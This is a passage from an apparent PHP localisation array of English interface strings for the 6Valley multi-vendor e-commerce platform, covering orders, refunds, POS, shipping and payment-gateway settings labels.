successfully' => 'Copied successfully', 'Product Edit' => 'Product Edit', 'successfully product updated!' => 'Successfully product updated!', 'We are sorry server is not responding' => 'We are sorry server is not responding', 'Try after sometime' => 'Try after sometime', 'Product Add' => 'Product Add', 'Your existing session token does not authorize you any more' => 'Your existing session token does not authorize you any more', 'Seller Apply' => 'Seller Apply', 'Customer_not_found_or_Account_has_been_suspended' => 'Customer not found or Account has been suspended', 'Shop Edit' => 'Shop Edit', 'Add Shipping' => 'Add Shipping', 'No conversation found' => 'No conversation found', 'out_of_stock' => 'Out of stock', 'Profile Settings' => 'Profile Settings', 'Nav menu' => 'Nav menu', 'Basic' => 'Basic', 'Full' => 'Full', 'Your first name' => 'Your first name', 'Optional' => 'Optional', 'Enter new email address' => 'Enter new email address', 'Save changes' => 'Save changes', 'Change' => 'Change', 'your' => 'Your', 'Enter new password' => 'Enter new password', 'Confirm' => 'Confirm', 'Confirm your new password' => 'Confirm your new password', 'changes' => 'Changes', 'Register' => 'Register', 'Please enter your first name' => 'Please enter your first name', 'Please enter your last name' => 'Please enter your last name', 'Please enter valid email address' => 'Please enter valid email address', 'Please enter your phone number' => 'Please enter your phone number', 'Customer Details' => 'Customer Details', 'Customers' => 'Customers', 'Customer details' => 'Customer details', 'Customer ID' => 'Customer ID', 'Joined At' => 'Joined At', 'Order ID' => 'Order ID', 'First name is required!' => 'First name is required!', 'Last name is required!' => 'Last name is required!', 'not_found' => 'Not found', 'Update Currency' => 'Update Currency', 'Currency Name' => 'Currency Name', 'Currency Symbol' => 'Currency Symbol', 'Currency Code' => 'Currency Code', 'Exchange Rate' => 'Exchange Rate', 'Bank Info' => 'Bank Info', 'Back to Shipping' => 'Back to Shipping', 'Order Complete' => 'Order Complete', 'You order has been confirmed and will be shipped according to the method you selected!' => 'You order has been confirmed and will be shipped according to the method you selected!', 'Track Order' => 'Track Order', 'order_status' => 'Order status', 'estimated_delivery_date' => 'Estimated delivery date', 'first_step' => 'First step', 'order_placed' => 'Order placed', 'second_step' => 'Second step', 'processing_order' => 'Processing order', 'third_step' => 'Third step', 'product_on_delivery' => 'Product on delivery', 'fourth_step' => 'Fourth step', 'product_dispatched' => 'Product dispatched', 'Product Preview' => 'Product Preview', '5 star' => '5 star', '4 star' => '4 star', '3 star' => '3 star', '2 star' => '2 star', '1 star' => '1 star', 'Invoice' => 'Invoice', 'Cart key or ID is required!' => 'Cart key or ID is required!', 'Delivery status updated to' => 'Delivery status updated to', 'order is already delivered' => 'Order is already delivered', 'Invalid withdraw request' => 'Invalid withdraw request', 'forgot_password ' => 'Forgot password ', 'follow_steps' => 'Follow steps', 'Fill in your email address below' => 'Fill in your email address below', 'We will send email you a temporary code' => 'We will send email you a temporary code', 'Use the code to change your password on our secure website' => 'Use the code to change your password on our secure website', 'Enter your email address' => 'Enter your email address', 'Please provide valid email address' => 'Please provide valid email address', 'Get new password' => 'Get new password', 'login_first' => 'Login first', 'Support Tickets' => 'Support Tickets', 'Leave a Message' => 'Leave a Message', 'Please write the message' => 'Please write the message', 'Submit Reply' => 'Submit Reply', 'Shipping Method Update' => 'Shipping Method Update', '10 $' => '10 $', 'Product added successfully!' => 'Product added successfully!', 'Edit Shipping' => 'Edit Shipping', 'empty_cart' => 'Empty cart', 'Incomplete bank info' => 'Incomplete bank info', 'Product name is required!' => 'Product name is required!', 'category is required!' => 'Category is required!', 'Product images is required!' => 'Product images is required!', 'Product thumbnail is required!' => 'Product thumbnail is required!', 'brand is required!' => 'Brand is required!', 'Unit is required!' => 'Unit is required!', 'successfully product added!' => 'Successfully product added!', 'Withdraw information View' => 'Withdraw information View', 'Note' => 'Note', 'Withdraw request process' => 'Withdraw request process', 'Deny' => 'Deny', 'Note about transaction or request' => 'Note about transaction or request', 'Brand Edit' => 'Brand Edit', 'successfully removed!' => 'Successfully removed!', 'Info updated successfully!' => 'Info updated successfully!', 'Change status to paid' => 'Change status to paid', 'successfully review submitted!' => 'Successfully review submitted!', 'Maintenance Mode on' => 'Maintenance Mode on', 'Website is under Maintenance' => 'Website is under Maintenance', 'Plese come back later' => 'Plese come back later', 'no_order_found' => 'No order found', 'Discount can not be more or equal to the price!' => 'Discount can not be more or equal to the price!', 'sent' => 'Sent', 'successfully_canceled' => 'Successfully canceled', 'Order Table' => 'Order Table', 'No such data found!' => 'No such data found!', 'Already in your wishlist' => 'Already in your wishlist', 'Password Reset' => 'Password Reset', 'Reset Your password' => 'Reset Your password', 'Click to Reset' => 'Click to Reset', 'First' => 'First', 'Shop info updated successfully!' => 'Shop info updated successfully!', 'product_list' => 'Product list', 'Withdraw request sent successfully!' => 'Withdraw request sent successfully!', 'Edit Role' => 'Edit Role', 'Role Update' => 'Role Update', 'successfully product deleted!' => 'Successfully product deleted!', 'changing_some_settings_will_take_time_to_show_effect_please_clear_session_or_wait_for_60_minutes_else_browse_from_incognito_mode' => 'Changing some settings will take time to show effect please clear session or wait for 60 minutes else browse from incognito mode', 'order_hasbeen_cancelled' => 'Order hasbeen cancelled', 'bkash' => 'Bkash', 'username' => 'Username', 'Contact View' => 'Contact View', 'View_User_Message' => 'View User Message', 'Not_Seen_Yet' => 'Not Seen Yet', 'User' => 'User', 'Reply_from_admin' => 'Reply from admin', 'No_reply' => 'No reply', 'Feedback' => 'Feedback', 'Please_send_a_Feedback' => 'Please send a Feedback', 'Seen' => 'Seen', 'Send_Mail' => 'Send Mail', 'Configure_your_mail_setup_first' => 'Configure your mail setup first', 'Mail_Body' => 'Mail Body', 'amount_to_be_paid' => 'Amount to be paid', 'paytabs' => 'Paytabs', 'fawry_pay' => 'Fawry pay', 'merchant_code' => 'Merchant code', 'security_key' => 'Security key', 'profile_id' => 'Profile id', 'server_key' => 'Server key', 'base_url_by_region' => 'Base url by region', 'delivery_man_management' => 'Delivery man management', 'delivery-man' => 'Delivery-man', 'Add new delivery-man' => 'Add new delivery-man', 'deliveryman' => 'Deliveryman', 'first' => 'First', 'last' => 'Last', 'branch' => 'Branch', 'identity' => 'Identity', 'passport' => 'Passport', 'driving' => 'Driving', 'license' => 'License', 'nid' => 'Nid', 'restaurant' => 'Restaurant', 'id' => 'Id', 'number' => 'Number', 'Deliveryman List' => 'Deliveryman List', 'delete' => 'Delete', 'Update delivery-man' => 'Update delivery-man', 'images' => 'Images', 'Invalid credential or account suspended' => 'Invalid credential or account suspended', 'waiting_for_location' => 'Waiting for location', 'assign' => 'Assign', 'message' => 'Message', 'start' => 'Start', 'resource_type' => 'Resource type', 'shop' => 'Shop', 'add_banner' => 'Add banner', 'banner_form' => 'Banner form', 'banner_update_form' => 'Banner update form', 'pos' => 'Pos', 'system' => 'System', 'POS' => 'POS', 'sign_out' => 'Sign out', 'item' => 'Item', 'addon' => 'Addon', 'extra' => 'Extra', 'update_discount' => 'Update discount', 'percent' => 'Percent', 'update_tax' => 'Update tax', 'cash' => 'Cash', 'card' => 'Card', 'discounted_products' => 'Discounted products', 'forgot_password_verification_by' => 'Forgot password verification by', 'announcement_setup' => 'Announcement setup', 'background_color' => 'Background color', 'text' => 'Text', 'order_note' => 'Order note', 'stock_limit_products' => 'Stock limit products', 'quantity' => 'Quantity', 'quantity_update' => 'Quantity update', 'update_quantity' => 'Update quantity', 'update_product_quantity' => 'Update product quantity', 'to_decrease_product_quantity_use_minus_before_number._Ex: -10' => 'To decrease product quantity use minus before number. Ex: -10', 'product_quantity_updated_successfully!' => 'Product quantity updated successfully!', 'product_quantity_can_not_be_less_than_0_!' => 'Product quantity can not be less than 0 !', 'stock_limit_products_list' => 'Stock limit products list', 'the_products_are_shown_in_this_list _which_quantity_is_below' => 'The products are shown in this list which quantity is below', 'default_sort' => 'Default sort', 'quantity_sort_by_(low_to_high)' => 'Quantity sort by (low to high)', 'quantity_sort_by_(high_to_low)' => 'Quantity sort by (high to low)', 'order_sort_by_(low_to_high)' => 'Order sort by (low to high)', 'order_sort_by_(high_to_low)' => 'Order sort by (high to low)', 'minimum_stock_limit_for_warning' => 'Minimum stock limit for warning', 'EX:123' => 'EX:123', 'reCaptcha' => 'ReCaptcha', 'captcha' => 'Captcha', 'reCaptcha Setup' => 'ReCaptcha Setup', 'credentials' => 'Credentials', 'Site Key' => 'Site Key', 'Secret Key' => 'Secret Key', 'reCaptcha credential Set up Instructions' => 'ReCaptcha credential Set up Instructions', 'Add a ' => 'Add a ', 'label' => 'Label', '(Ex: Test Label)' => '(Ex: Test Label)', 'Select reCAPTCHA v2 as' => 'Select reCAPTCHA v2 as ', 'reCAPTCHA Type' => 'ReCAPTCHA Type', 'Sub type: I m not a robot Checkbox' => 'Sub type: I m not a robot Checkbox', 'domain' => 'Domain', '(For ex: demo.6amtech.com)' => '(For ex: demo.6amtech.com)', 'Check in ' => 'Check in ', 'Accept the reCAPTCHA Terms of Service' => 'Accept the reCAPTCHA Terms of Service', 'Press' => 'Press', 'Enter recaptcha value' => 'Enter recaptcha value', 'Please check the recaptcha' => 'Please check the recaptcha', 'Go to the facebook developer page' => 'Go to the facebook developer page', 'Click Here' => 'Click Here', 'If needed' => 'If needed', 'Provide Primary Email and press' => 'Provide Primary Email and press', 'In about section select' => 'In about section select', 'Select an app type and press' => 'Select an app type and press', 'Complete the add details form and press' => 'Complete the add details form and press', 'left sidebar' => 'Left sidebar', 'Make sure to check' => 'Make sure to check', 'must on' => 'Must on', 'Update Phone' => 'Update Phone', 'few_steps_ahead' => 'Few steps ahead', 'Verify' => 'Verify', 'ReCAPTCHA Failed' => 'ReCAPTCHA Failed', 'recaptcha' => 'Recaptcha', 'gallery' => 'Gallery', 'download' => 'Download', 'upload' => 'Upload', 'upload_zip_file' => 'Upload zip file', 'file_manager' => 'File manager', 'file_path_copied_successfully!' => 'File path copied successfully!', 'copy_path' => 'Copy path', 'third_party_apis' => 'Third party apis', 'map_api_hint' => 'NB: Client key should have enable map javascript api and you can restrict it with http refere. Server key should have enable place api key and you can restrict it with ip.', 'map_api_hint_2' => 'Map api hint 2', 'map_api_key' => 'Map api key', 'client' => 'Client', 'server' => 'Server', 'search_your_location_here' => 'Search your location here', 'search_here' => 'Search here', 'config_data_updated' => 'Config data updated', 'billing_address' => 'Billing address', 'choose_billing_address' => 'Choose billing address', 'high_low' => 'High low', 'same_as_shipping_address' => 'Same as shipping address', 'Please fill all required fields of shipping address' => 'Please fill all required fields of shipping address', 'Please fill all444 required fields' => 'Please fill all444 required fields', 'incomplete_info' => 'Incomplete info', 'mercadopago' => 'Mercadopago', 'access_token' => 'Access token', 'flutterwave' => 'Flutterwave', 'hash' => 'Hash', 'company_copyright_text' => 'Company copyright text', 'latitude' => 'Latitude', 'longitude' => 'Longitude', 'Please fill all required fields of shipping/billing address' => 'Please fill all required fields of shipping/billing address', 'shipping_to' => 'Shipping to', 'billing_to' => 'Billing to', 'Billing_address' => 'Billing address', 'invalid_customer_data' => 'Invalid customer data', 'show_locations_on_map' => 'Show locations on map', 'location' => 'Location', 'data' => 'Data', 'empty' => 'Empty', 'no_location_found' => 'No location found', 'billing' => 'Billing', 'UPDATE_ADDRESSES' => 'UPDATE ADDRESSES', 'access_denied' => 'Access denied', 'shipping_and_billing_address' => 'Shipping and billing address', 'Shipping_and_billing' => 'Shipping and billing', 'text_color' => 'Text color', 'Delivery-man removed!' => 'Delivery-man removed!', 'shipping_address_has_been_given_below' => 'Shipping address has been given below', 'A_Z' => 'A Z', 'Z_A' => 'Z A', 'A_to_Z' => 'A to Z', 'Z_to_A' => 'Z to A', 'Low_to_High' => 'Low to High', 'High_to_Low' => 'High to Low', 'analytics' => 'Analytics', 'analytics_script' => 'Analytics script', 'pixel_analytics_script' => 'Pixel analytics script', 'pixel_analytics_script_from_facebook' => 'Pixel analytics script from facebook', 'walking_customer' => 'Walking customer', 'new_order' => 'New order', 'current_customer' => 'Current customer', 'clear_cart' => 'Clear cart', 'coupon' => 'Coupon', 'add_new_customer' => 'Add new customer', 'Ex_:_ex@example.com' => 'Ex : ex@example.com', 'city' => 'City', 'extra_discount_added_successfully' => 'Extra discount added successfully', 'your_cart_is_empty' => 'Your cart is empty', 'this_discount_is_not_applied_for_this_amount' => 'This discount is not applied for this amount', 'amount_can_not_be_negative_or_zero!' => 'Amount can not be negative or zero!', 'coupon_added_successfully' => 'Coupon added successfully', 'coupon_is_invalid' => 'Coupon is invalid', 'selected' => 'Selected', 'product_quantity_is_not_enough!' => 'Product quantity is not enough!', 'Product_quantity_can_not_be_zero_or_less_than_zero_in_cart!' => 'Product quantity can not be zero or less than zero in cart!', 'Product_quantity_updated!' => 'Product quantity updated!', 'Coupon Edit' => 'Coupon Edit', 'Discount on Purchase' => 'Discount on Purchase', 'Customer Name' => 'Customer Name', 'QTY' => 'QTY', 'DESC' => 'DESC', 'Items Price' => 'Items Price', 'VAT' => 'VAT', 'extra_discount' => 'Extra discount', 'Paid_by' => 'Paid by', 'THANK YOU' => 'THANK YOU', 'POS Order List' => 'POS Order List', 'pos_orders' => 'Pos orders', 'customer_info' => 'Customer info', 'Employee Edit' => 'Employee Edit', 'input if you want to change' => 'Input if you want to change', 'hi' => 'Hi', 'welcome_to_dashboard' => 'Welcome to dashboard', 'search_by_name_oremail_or_phone' => 'Search by name oremail or phone', 'search_by_name_or_email_or_phone' => 'Search by name or email or phone', 'pos_management' => 'Pos management', 'select minimum one box' => 'Select minimum one box', 'select_minimum_one_selection_box' => 'Select minimum one selection box', 'All Categories' => 'All Categories', 'paytm' => 'Paytm', 'paytm_merchant_key' => 'Paytm merchant key', 'paytm_merchant_mid' => 'Paytm merchant mid', 'paytm_merchant_website' => 'Paytm merchant website', 'liqpay' => 'Liqpay', 'privateKey' => 'PrivateKey', 'Redirecting_to_the_payment_page' => 'Redirecting to the payment page', 'short_cut_keys' => 'Short cut keys', 'to_click_order' => 'To click order', 'to_click_payment_submit' => 'To click payment submit', 'to_close_payment_submit' => 'To close payment submit', 'to_click_cancel_cart_item_all' => 'To click cancel cart item all', 'to_click_add_new_customer' => 'To click add new customer', 'to_submit_add_new_customer_form' => 'To submit add new customer form', 'to_click_short_cut_keys' => 'To click short cut keys', 'to_print_invoice' => 'To print invoice', 'to_cancel_invoice' => 'To cancel invoice', 'to_focus_search_input' => 'To focus search input', 'to_click_extra_discount' => 'To click extra discount', 'to_click_coupon_discount' => 'To click coupon discount', 'to_click_clear_cart' => 'To click clear cart', 'to_click_new_order' => 'To click new order', 'Are_you_sure ' => 'Are you sure ', 'You_want_to_remove_all_items_from_cart!!' => 'You want to remove all items from cart!!', 'pos_order' => 'Pos order', 'Print Invoice' => 'Print Invoice', 'POS_order' => 'POS order', 'extra_on_discount' => 'Extra on discount', 'Forgot Password' => 'Forgot Password', 'Forgot your password' => 'Forgot your password', 'Change your password in three easy steps. This helps to keep your new password secure' => 'Change your password in three easy steps. This helps to keep your new password secure', 'We will email you a temporary code' => 'We will email you a temporary code', 'clean_database' => 'Clean database', 'environment_setup' => 'Environment setup', 'You have new order Check Please' => 'You have new order Check Please', 'Ok let me check' => 'Ok let me check', 'smtp_mail' => 'Smtp mail', 'sendgrid_mail_config' => 'Sendgrid mail config', 'sendgrid_mail' => 'Sendgrid mail', 'refund_request' => 'Refund request', 'subtotal' => 'Subtotal', 'total_refund_amount' => 'Total refund amount', 'refund_reson' => 'Refund reson', 'refund_reason' => 'Refund reason', 'status_not_changable_now' => 'Status not changable now', 'refund_pending' => 'Refund pending', 'refund_requested_successful!!' => 'Refund requested successful!!', 'refund_setup' => 'Refund setup', 'refund_settings' => 'Refund settings', 'environment' => 'Environment', 'This_page_is_having_sensitive_data.Make_sure_before_changing.' => 'This page is having sensitive data.Make sure before changing.', 'APP_NAME' => 'APP NAME', 'APP_DEBUG' => 'APP DEBUG', 'True' => 'True', 'False' => 'False', 'APP_MODE' => 'APP MODE', 'Live' => 'Live', 'Dev' => 'Dev', 'APP_URL' => 'APP URL', 'DB_CONNECTION' => 'DB CONNECTION', 'DB_HOST' => 'DB HOST', 'DB_PORT' => 'DB PORT', 'DB_DATABASE' => 'DB DATABASE', 'DB_USERNAME' => 'DB USERNAME', 'DB_PASSWORD' => 'DB PASSWORD', 'BUYER_USERNAME' => 'BUYER USERNAME', 'PURCHASE_CODE' => 'PURCHASE CODE', 'refund_request_time_limit' => 'Refund request time limit', 'refund_request_day_limit' => 'Refund request day limit', 'day_limit' => 'Day limit', 'refund_day_limit_updated!!' => 'Refund day limit updated!!', 'refund_request_list' => 'Refund request list', 'approved' => 'Approved', 'refunded' => 'Refunded', 'rejected' => 'Rejected', 'refund_list' => 'Refund list', 'Order_details_id' => 'Order details id', 'product_name' => 'Product name', 'refund_details' => 'Refund details', 'refund_status_updated_successfully!!' => 'Refund status updated successfully!!', 'it is already refunded you can not change it!!' => 'It is already refunded you can not change it!!', 'You_want_to_change_refund_status!!' => 'You want to change refund status!!', 'order_Transactions' => 'Order Transactions', 'refund_status' => 'Refund status', 'change_refund_status' => 'Change refund status', 'refund_status_updated!!' => 'Refund status updated!!', 'DB_clean' => 'DB clean', 'Clean' => 'Clean', 'database' => 'Database', 'This_page_contains_sensitive_information.Make_sure_before_changing.' => 'This page contains sensitive information.Make sure before changing.', 'Clear' => 'Clear', 'Sensitive_data! Make_sure_before_changing.' => 'Sensitive data! Make sure before changing.', 'Cancelled' => 'Cancelled', 'refunded status can not be changed!!' => 'Refunded status can not be changed!!', 'refund_Transactions' => 'Refund Transactions', 'order_details_id' => 'Order details id', 'customer_id' => 'Customer id', 'transaction_type' => 'Transaction type', 'Search by orders id or order_details_id' => 'Search by orders id or order details id', 'refund_transaction_table' => 'Refund transaction table', 'Update Notification' => 'Update Notification', 'Notification Update' => 'Notification Update', 'you_can_refund_request_after_the_product_is_delivered!' => 'You can refund request after the product is delivered!', 'refund_approved' => 'Refund approved', 'refund_refunded' => 'Refund refunded', 'refund_placed_successfully' => 'Refund placed successfully', 're' => 'Re', 'no_attachment_found' => 'No attachment found', 'Search_by_order_id_or_order_details_id' => 'Search by order id or order details id', 'Refund Details' => 'Refund Details', 'Refund request' => 'Refund request', 'no_customer_found' => 'No customer found', 'customer_not_found' => 'Customer not found', 'product_not_found' => 'Product not found', 'Redirecting_to_the_payment' => 'Redirecting to the payment', 'total_refundable_amount' => 'Total refundable amount', 'Extra_discount_can_not_be_more_than_100_percent' => 'Extra discount can not be more than 100 percent', 'total_discount' => 'Total discount', 'total_tax' => 'Total tax', 'Seller POS' => 'Seller POS', 'Seller POS permission on/off' => 'Seller POS permission on/off', 'approved_note' => 'Approved note', 'rejected_note' => 'Rejected note', 'digitaly_paid' => 'Digitaly paid', 'payment_info' => 'Payment info', 'Email Verification' => 'Email Verification', 'Verify your email' => 'Verify your email', 'Token' => 'Token', 'email_failed' => 'Email failed', 'refund_status_change_log' => 'Refund status change log', 'refund_status_changed_log' => 'Refund status changed log', 'refund_request_id' => 'Refund request id', 'note' => 'Note', 'change_by' => 'Change by', 'changed_by' => 'Changed by', 'seller_info' => 'Seller info', 'additional_information' => 'Additional information', 'seller_email' => 'Seller email', 'seller_phone' => 'Seller phone', 'delivery_man_name' => 'Delivery man name', 'deliveryman_name' => 'Deliveryman name', 'not_assigned' => 'Not assigned', 'deliveryman_email' => 'Deliveryman email', 'deliveryman_phone' => 'Deliveryman phone', 'self_product' => 'Self product', 'order_details' => 'Order details', 'click_here' => 'Click here', 'deliveryman_info' => 'Deliveryman info', 'customer_details' => 'Customer details', 'rejected_reason' => 'Rejected reason', 'Customer_not_found' => 'Customer not found', 'refunded status can not be changed!! Admin already change the statusapproved!!' => 'Refunded status can not be changed!! Admin already change the statusapproved!!', 'refunded status can not be changed!! Admin already changed the status :rejected!!' => 'Refunded status can not be changed!! Admin already changed the status :rejected!!', 'refund_rejected' => 'Refund rejected', 'product_name_not_found' => 'Product name not found', 'Search_by_order_id' => 'Search by order id', 'submit_a_review' => 'Submit a review', 'successfully_added_review' => 'Successfully added review', 'refunded status can not be changed!! Admin already changed the status : approved!!' => 'Refunded status can not be changed!! Admin already changed the status : approved!!', 'inhouse_product' => 'Inhouse product', 'Business_mode' => 'Business mode', 'single_vendor' => 'Single vendor', 'multi_vendor' => 'Multi vendor', 'Becareful for change the mode' => 'Becareful for change the mode', 'Becareful before change the mode' => 'Becareful before change the mode', 'For single vendor operation' => 'For single vendor operation', 'deactive all seller product' => 'Deactive all seller product', 'please!!' => 'Please!!', 'sellersfgm .' => 'Sellersfgm .', 'Single_vendor' => 'Single vendor', 'turn on' => 'Turn on', 'turn off' => 'Turn off', 'For single vendor operation please deactive all seller product' => 'For single vendor operation please deactive all seller product', 'Search by orders id' => 'Search by orders id', 'refund_id' => 'Refund id', 'Search_by_order_id_or_refund_id' => 'Search by order id or refund id', 'Search by orders id _or_refund_id' => 'Search by orders id or refund id', 'deactive all seller!!' => 'Deactive all seller!!', 'digitally_paid' => 'Digitally paid', 'For multi vendor operation' => 'For multi vendor operation', 'For single vendor operation deactive all seller!!' => 'For single vendor operation deactive all seller!!', 'Now your multi vendor business mode is opening you can add new seller !!' => 'Now your multi vendor business mode is opening you can add new seller !!', 'order_canceled_successfully' => 'Order canceled successfully', 'Multi-currency is depends on exchange rate and your gateway configuration So if you don t need multi-currency it will be better select single currency. (We prefer to use single currency).' => 'Multi-currency is depends on exchange rate and your gateway configuration So if you don t need multi-currency it will be better select single currency. (We prefer to use single currency).', 'decimal_point_settings' => 'Decimal point settings', 'choose_priority_number' => 'Choose priority number', 'priority' => 'Priority', 'Thanks for your order' => 'Thanks for your order', 'The billing period for your paid subscription to Google Workspace begins tomorrow.' => 'nice', 'Items Ordered' => 'Items Ordered', 'thank_you_for_order' => 'Thank you for order', 'Go to your order' => 'Go to your order', 'seller_details' => 'Seller details', 'sub_totalvfdv' => 'Sub totalvfdv', 'inhouse_products' => 'Inhouse products', 'thanks_for_the_order' => 'Thanks for the order', 'Your_order_ID' => 'Your order ID', 'Ordered_Items' => 'Ordered Items', 'to_view_your_order_sign_into_your' => 'To view your order sign into your', 'to_view_your_order_sign_into_your6Valley' => 'To view your order sign into your6Valley', 'to_view_your_order_sign_into_your 6Valley account_and_please_click_below_button' => 'To view your order sign into your 6Valley account and please click below button', 'seller_shipping_method' => 'Seller shipping method', 'shipping_responsibility' => 'Shipping responsibility', 'shipping_responsibility_updated_successfully!!' => 'Shipping responsibility updated successfully!!', 'order_wise' => 'Order wise', 'category_wise' => 'Category wise', 'product_wise' => 'Product wise', 'for_inhouse_deliver' => 'For inhouse deliver', 'shipping_type_updated_successfully!!' => 'Shipping type updated successfully!!', 'update_category_shipping_cost' => 'Update category shipping cost', 'category_name' => 'Category name', 'not' => 'Not', 'yes' => 'Yes', 'multiply_with_QTY' => 'Multiply with QTY', 'no' => 'No', 'add_new_order_wise_shipping' => 'Add new order wise shipping', 'add_order_wise_shipping' => 'Add order wise shipping', 'order_wise_shipping_method' => 'Order wise shipping method', 'order wise shipping method Status updated successfully' => 'Order wise shipping method Status updated successfully', 'Order Wise Shipping Method deleted successfully' => 'Order Wise Shipping Method deleted successfully', 'inhouse_shipping' => 'Inhouse shipping', 'seller_wise_shipping' => 'Seller wise shipping', 'shipping_method_updated_successfully!!' => 'Shipping method updated successfully!!', 'shipping_cost' => 'Shipping cost', 'shipping_cost_multiply_with_quantity' => 'Shipping cost multiply with quantity', 'add_new_seller' => 'Add new seller', 'admin_approval_for_products' => 'Admin approval for products', 'approval_for_products' => 'Approval for products', 'new_product' => 'New product', 'product_wise_shipping_cost' => 'Product wise shipping cost', 'product_wise_shipping_cost_approval' => 'Product wise shipping cost approval', 'Update & Publish' => 'Update & Publish', 'admin_approval_for_products_updated_successfully!' => 'Admin approval for products updated successfully!', 'of' => 'Of', 'shipping Cost' => 'Shipping Cost', 'if the shipping responsibility is inhouse and product wise shipping is activated then this function will work' => 'If the shipping responsibility is inhouse and product wise shipping is activated then this function will work', 'product_details' => 'Product details', 'sorry_stock_is_limited' => 'Sorry stock is limited', 'New order received' => 'New order received', 'Notification mail for new order received' => 'Notification mail for new order received', 'We have sent you this email to notify that you have a new order. You will be able to see your orders after login to your panel' => 'We have sent you this email to notify that you have a new order. You will be able to see your orders after login to your panel', 'New order ID for you' => 'New order ID for you', 'updated_products' => 'Updated products', 'updated_product_list' => 'Updated product list', 'previous_shipping_cost' => 'Previous shipping cost', 'new_shipping_cost' => 'New shipping cost', 'deneied' => 'Deneied', 'deneid' => 'Deneid', 'status updated successfully' => 'Status updated successfully', 'shipping_info' => 'Shipping info', 'shipping_type' => 'Shipping type', 'choose_delivery_type' => 'Choose delivery type', 'by_self_delivery_man' => 'By self delivery man', 'by_third_party_delivery_service' => 'By third party delivery service', 'update_third_party_delivery_info' => 'Update third party delivery info', 'tracking_id' => 'Tracking id', 'delivery_service_name' => 'Delivery service name', 'optional' => 'Optional', 'updated_successfully!' => 'Updated successfully!', 'choose_delivery_man' => 'Choose delivery man', 'self_delivery' => 'Self delivery', 'delivery_man_phone' => 'Delivery man phone', 'delivery_info' => 'Delivery info', 'Enter captcha value' => 'Enter captcha value', 'Captcha Failed' => 'Captcha Failed', 'digit_after_decimal_point' => 'Digit after decimal point ', 'ex:0.00' => 'Ex:0.00', 'ex: 0.00' => 'Ex: 0.00', ' ex: 0.00' => ' ex: 0.00', 'the_lowest_number_get_highest_priority' => 'The lowest number get highest priority', 'the_lowest_number_will_get_highest_priority' => 'The lowest number will get highest priority', 'the_lowest_number_will_get_the_highest_priority' => 'The lowest number will get the highest priority', 'cost_per_product' => 'Cost per product', 'Please_make_sure_all_the product s_delivery_charges_are_up_to_date.' => 'Please, make sure all the products delivery charges are up to date.', 'Main Banner' => 'Main Banner', 'Footer Banner' => 'Footer Banner', 'Popup Banner' => 'Popup Banner', 'Are_you_sure_remove_this_product' => 'Are you sure remove this product', 'product_removed_successfully' => 'Product removed successfully', 'Removed' => 'Removed', 'Create credentials' => 'Create credentials', 'OAuth client ID' => 'OAuth client ID', 'Web application' => 'Web application', 'ADD URI' => 'ADD URI', 'Authorized redirect URIs' => 'Authorized redirect URIs', 'Callback URI' => 'Callback URI', 'Create' => 'Create', 'Client ID' => 'Client ID', 'Client Secret' => 'Client Secret', 'Get Started' => 'Get Started', 'Continue' => 'Continue', 'Confirm Email' => 'Confirm Email', 'Other' => 'Other', 'Complete Registration' => 'Complete Registration', 'Create App' => 'Create App', 'Facebook Login' => 'Facebook Login', 'Set Up' => 'Set Up', 'Site URL' => 'Site URL', 'Base URL of the site ex:' => 'Base URL of the site ex:', 'Client OAuth Login' => 'Client OAuth Login', 'Valid OAuth Redirect URIs' => 'Valid OAuth Redirect URIs', 'Save Changes' => 'Save Changes', 'Currency status successfully changed.' => 'Currency status successfully changed.', 'This Currency cannot be removed due to payment gateway dependency!' => 'This Currency cannot be removed due to payment gateway dependency!', 'New Currency inserted successfully!' => 'New Currency inserted successfully!', 'Currency removed successfully!' => 'Currency removed successfully!', 'Currency updated successfully!' => 'Currency updated successfully!', 'ratio 1:1 ' => 'Ratio 1:1 ', '250x60 px' => '250x60 px ', 'choose_environment' => 'Choose environment', 'sandbox' => 'Sandbox', 'live' => 'Live', 'flash deals' => 'Flash deals', 'flash deal' => 'Flash deal', 'day' => 'Day', 'hrs' => 'Hrs', 'min' => 'Min', 'sec' => 'Sec', 'Main Section Banner' => 'Main Section Banner', 'Fast Delivery all accross the country' => 'Fast Delivery all accross the country', 'Safe Payment' => 'Safe Payment', '7 Days Return Policy' => '7 Days Return Policy', '100% Authentic Products' => '100% Authentic Products', 'ARRIVALS' => 'ARRIVALS', 'best sellings' => 'Best sellings', 'top rated' => 'Top rated', 'About Company' => 'About Company', 'NEWS LETTER' => 'NEWS LETTER', 'Subscribe to out neew channel to get latest updates' => 'Subscribe to out neew channel to get latest updates', 'Your Email Address' => 'Your Email Address', 'subscribe' => 'Subscribe', 'Head Office' => 'Head Office', 'Your subscription successfully done!!' => 'Your subscription successfully done!!', 'You already subcribed this site!!' => 'You already subcribed this site!!', 'subscriber_list' => 'Subscriber list', 'System Default currency updated successfully!' => 'System Default currency updated successfully!', 'Search Products' => 'Search Products', 'wish_listed' => 'Wish listed', 'Seller_info' => 'Seller info', 'chat' => 'Chat', 'Visit Store' => 'Visit Store', 'More From The Store' => 'More From The Store', 'ratings' => 'Ratings', 'Excellent' => 'Excellent', 'Good' => 'Good', 'Average' => 'Average', 'Below Average' => 'Below Average', 'Poor' => 'Poor', 'Product Review' => 'Product Review', 'You_can_track_your_order_by_clicking_the_below_button' => 'You can track your order by clicking the below button', 'overview' => 'Overview', 'Chat with seller' => 'Chat with seller ', 'Search products from this store' => 'Search products from this store', 'default currency can not be deleted!' => 'Default currency can not be deleted!', 'default currency can not be deleted!to delete change the default currency first!' => 'Default currency can not be deleted!to delete change the default currency first!', 'See the latest deals and exciting new offers' => 'See the latest deals and exciting new offers ', 'view more' => 'View more', 'no more review ' => 'No more review ', 'no more review remain to load' => 'No more review remain to load', 'Search_by_email' => 'Search by email', 'Ratio_1:1' => 'Ratio 1:1', 'Start a conversation' => 'Start a conversation', 'Your_shop_address' => 'Your shop address', 'SUPPORT TICKET ANSWER' => 'SUPPORT TICKET ANSWER', 'Date Submitted' => 'Date Submitted', 'Last Updated' => 'Last Updated', 'Submit message' => 'Submit message', 'subscribe to our new channel to get latest updates' => 'Subscribe to our new channel to get latest updates', 'account_&_shipping_info' => 'Account & shipping info', 'default language can not be deleted!to delete change the default language first!' => 'Default language can not be deleted!to delete change the default language first!', 'default language can not be deleted! to delete change the default language first!' => 'Default language can not be deleted! to delete change the default language first!', 'billing_input_by_customer' => 'Billing input by customer', 'deactive' => 'Deactive', 'days_free_delivery' => 'Days free delivery', 'access_denied!!' => 'Access denied!!', 'shipping_input_by_customer' => 'Shipping input by customer', 'My Wallet' => 'My Wallet', 'my_wallet' => 'My wallet', 'transection_history' => 